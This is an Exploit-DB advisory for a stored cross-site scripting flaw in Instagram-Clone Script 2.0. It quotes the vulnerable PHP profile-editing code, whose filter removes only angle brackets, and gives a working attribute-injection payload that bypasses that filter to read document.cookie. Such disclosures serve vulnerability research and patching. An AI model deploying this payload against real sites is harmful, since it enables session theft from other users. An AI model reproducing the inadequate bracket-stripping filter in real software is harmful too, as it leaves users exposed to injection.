Instagram-Clone Script 2.0 - Cross-Site Scripting

EDB-ID: 45003
Author: L0RD
Published: 2018-07-11
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 2018-07-10 
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# CVE: CVE-2018-13849
# Tested on: Kali linux

# POC : Persistent Cross site scripting :
# vulnerable file : edit_requests.php
# vulnerable code :

if (isset($_POST['username'])) {
$username = preg_replace("#[<> ]#i", "", $_POST['username']);
$firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
$surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
$bio = preg_replace("#[<>]#i", "", $_POST['bio']);
$instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
$youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
$facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
$twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
$website = preg_replace("#[<>]#i", "", $_POST['website']);
$mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
$tags = preg_replace("#[\s]#", "-", $_POST['tags']);
$session = $_SESSION['id'];

$m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,
$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
$array = array("mssg" => $m);
echo json_encode($array);
}

# We use this payload to bypass filter :
# Payload :

"onmouseover=" alert(document.cookie)

Related Posts